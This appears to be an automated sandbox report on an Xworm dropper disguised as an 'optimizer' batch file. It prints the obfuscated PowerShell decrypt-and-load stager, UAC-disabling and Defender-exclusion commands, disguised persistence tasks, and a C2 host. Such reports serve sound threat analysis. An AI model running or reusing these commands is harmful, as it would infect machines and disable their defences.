Analysis Overview
SHA256
e4bfeab87ffecd9f9cdb36c731f2c39966fce80527d9424b1c5c53560a5cb241
Threat Level: Known bad
The file Antares-Optimizer.bat was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Drops startup file
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Creates scheduled task(s)
Modifies registry class
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 13:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 13:29
Reported
2024-06-14 13:30
Platform
win11-20240611-en
Max time kernel
30s
Max time network
32s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Edge" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Antares-Optimizer.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wxqIIOhaBPruq0ALFHbbK1F9sQAyMy/uB7qLBivji5o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ySAtAc9MswRr9qNlYB0XUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vbZoh=New-Object System.IO.MemoryStream(,$param_var); $KpgNA=New-Object System.IO.MemoryStream; $itCaG=New-Object System.IO.Compression.GZipStream($vbZoh, [IO.Compression.CompressionMode]::Decompress); $itCaG.CopyTo($KpgNA); $itCaG.Dispose(); $vbZoh.Dispose(); $KpgNA.Dispose(); $KpgNA.ToArray();}function execute_function($param_var,$param2_var){ $pjffx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SIzBx=$pjffx.EntryPoint; $SIzBx.Invoke($null, $param2_var);}$EKrmm = 'C:\Users\Admin\AppData\Local\Temp\Antares-Optimizer.bat';$host.UI.RawUI.WindowTitle = $EKrmm;$nuWeH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($EKrmm).Split([Environment]::NewLine);foreach ($CpHmo in $nuWeH) { if ($CpHmo.StartsWith('nfUgYrRItChUqozIdsEe')) { $nkdsP=$CpHmo.Substring(20); break; }}$payloads_var=[string[]]$nkdsP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_375_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_375.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_375.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_375.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wxqIIOhaBPruq0ALFHbbK1F9sQAyMy/uB7qLBivji5o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ySAtAc9MswRr9qNlYB0XUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vbZoh=New-Object System.IO.MemoryStream(,$param_var); $KpgNA=New-Object System.IO.MemoryStream; $itCaG=New-Object System.IO.Compression.GZipStream($vbZoh, [IO.Compression.CompressionMode]::Decompress); $itCaG.CopyTo($KpgNA); $itCaG.Dispose(); $vbZoh.Dispose(); $KpgNA.Dispose(); $KpgNA.ToArray();}function execute_function($param_var,$param2_var){ $pjffx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SIzBx=$pjffx.EntryPoint; $SIzBx.Invoke($null, $param2_var);}$EKrmm = 'C:\Users\Admin\AppData\Roaming\Windows_Log_375.bat';$host.UI.RawUI.WindowTitle = $EKrmm;$nuWeH=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($EKrmm).Split([Environment]::NewLine);foreach ($CpHmo in $nuWeH) { if ($CpHmo.StartsWith('nfUgYrRItChUqozIdsEe')) { $nkdsP=$CpHmo.Substring(20); break; }}$payloads_var=[string[]]$nkdsP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HoaxOptimizerPanel.bat" "
C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
C:\Windows\system32\reg.exe
Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
C:\Windows\system32\mode.com
mode 145,30
C:\Windows\system32\reg.exe
reg add HKLM /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
C:\Windows\system32\reg.exe
reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft Edge'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\Admin\AppData\Roaming\Microsoft Edge"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\HoaxOptimizerPanel.bat"
C:\Windows\system32\findstr.exe
findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\HoaxOptimizerPanel.bat"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 147.185.221.20:6807 | loans-clip.gl.at.ply.gg | tcp |
| US | 147.185.221.20:6807 | loans-clip.gl.at.ply.gg | tcp |
Files
memory/996-0-0x00007FFB7B2A3000-0x00007FFB7B2A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yo0mfwul.rgi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/996-9-0x000001E935A00000-0x000001E935A22000-memory.dmp
memory/996-10-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
memory/996-11-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
memory/996-13-0x000001E935E40000-0x000001E935E86000-memory.dmp
memory/996-12-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
memory/996-14-0x000001E935BD0000-0x000001E935BD8000-memory.dmp
memory/996-15-0x000001E935E90000-0x000001E935F34000-memory.dmp
memory/4656-17-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
memory/4656-26-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
memory/4656-27-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
memory/4656-30-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\Windows_Log_375.vbs
| MD5 | 86194fc7f6d36f0ffacf156a86c4e7e6 |
| SHA1 | b049146e2aa2159b060366dedf1bb6e9a8ed7c1b |
| SHA256 | 6d261d48658aa57c2a6eb1ffb1052242a0c24d021c05d6a83ac5c2171fd77166 |
| SHA512 | 0baacffaae82bb19e9f0e410af81fcbb82d829bf77b21da81c47c44be963b9bf6f3a53bb77a5b655c6d6f1c579e733067a0593e4494951df35ecb7d15d046114 |
C:\Users\Admin\AppData\Roaming\Windows_Log_375.bat
| MD5 | 985c76b5d4f0ed03fc0f591ba405e438 |
| SHA1 | c3b78140c4da8c07af911ada429dcf61903a713f |
| SHA256 | e4bfeab87ffecd9f9cdb36c731f2c39966fce80527d9424b1c5c53560a5cb241 |
| SHA512 | 0222d10de124abdee610a44b16873870853c9015056dbc29d0be24f19b990c05c494ffa4f38e9ed141096a2381fc8717ea470603f79d301a42411d3958b3324a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |
memory/4676-51-0x0000012F3C880000-0x0000012F3C8B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\XClient.exe
| MD5 | 736b616f619ddca45592fe8ca46fd3ee |
| SHA1 | db5f95398874e023a62025bad772dffdc950c44f |
| SHA256 | 27f0f3826330f7792ca5c49b2a34713cae074fc99e6441f8902281cd39bc313c |
| SHA512 | 5f31ca006d95cfa441d16014ef0adc66d2a06fa1bc92dd5e96653df09ac3326a793c86cbe4a9123571bb1b5e47f5094cc982860e956b72a61a34fe0c3a475c5d |
C:\Users\Admin\AppData\Local\Temp\HoaxOptimizerPanel.bat
| MD5 | e03a31f264e58472bd637efcad0d1a03 |
| SHA1 | 3796dd30aebcf3aa6d006d5dddd7d2864e14963e |
| SHA256 | 2097980870ce3cb140d151b4e681a4ee28d6d27e751727a84b929b4e03d48673 |
| SHA512 | ccfc0eeeb3a8a758bea0d3c85df3fee825516f416d429d3f1bd4d40797a989485ca3b6c12a827b1525bef2c17f86fe26c8bc30cc5eae025af039fa2d4535202d |
memory/2656-65-0x00000000002C0000-0x00000000002F6000-memory.dmp
memory/996-66-0x00007FFB7B2A0000-0x00007FFB7BD62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f65feb0fbbd0fcb9da91d117a38e4f31 |
| SHA1 | 95b1256dd050df6d555a4d06d4dc7ac542b6a070 |
| SHA256 | cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c |
| SHA512 | 0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d0a4a3b9a52b8fe3b019f6cd0ef3dad6 |
| SHA1 | fed70ce7834c3b97edbd078eccda1e5effa527cd |
| SHA256 | 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31 |
| SHA512 | 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3c0fe86517be16d2b0a671148c0274d2 |
| SHA1 | bd7a487a037395e9ede9e76b4a455fdf386ba8db |
| SHA256 | 5f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302 |
| SHA512 | 642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8b1394bd98c93d68bb4151a8c8c4015b |
| SHA1 | 3c5695c58a2186c1a13e70d8de9343f660429a91 |
| SHA256 | 3d46aa2ace9880ec7c1eb00581078beb3ca2107f343654aa5d5e250c97bf67d8 |
| SHA512 | b7fe198d72b322dd2b2badf038821af9ceccae8b506f7475d8c253ea40aef9b0ba50dae223d5251d72a14aec81d025d394d3277576125d03f3e4ec393459a607 |
memory/4676-117-0x0000012F3CC20000-0x0000012F3CC2C000-memory.dmp